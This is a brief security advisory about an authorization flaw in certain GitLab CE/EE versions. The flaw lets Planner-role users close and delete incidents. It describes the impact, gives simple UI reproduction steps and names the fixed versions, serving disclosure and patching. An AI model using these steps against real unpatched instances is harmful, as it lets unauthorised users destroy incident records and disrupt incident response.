GitLab CE/EE Improper Authorization Vulnerability in Incident Management

A vulnerability exists in GitLab Community Edition (CE) and Enterprise Edition (EE) versions 17.7 prior to 17.7.4 and 17.8 prior to 17.8.2. This vulnerability allows users with the Planner role to improperly close and delete incidents, bypassing the established role-based access control (RBAC) requirements. Closing incidents should require at least a Reporter role, while deleting them necessitates an Owner role.

Impact

This vulnerability disrupts incident response processes by allowing unauthorized users to close active incidents, leading to unresolved issues and potential downtime. Additionally, it enables the deletion of incident data, causing a loss of critical historical records needed for audits and accountability.

Reproduction

To reproduce this vulnerability, log into GitLab as a user with the Planner role. Navigate to the project's Incidents section and select an active incident. Attempt to close and delete the incident. Both actions will be successfully completed, despite the Planner role not having the necessary permissions according to the documentation.

Remediation

Users can update to GitLab versions 17.8.2 or 17.7.4, where this vulnerability has been fixed.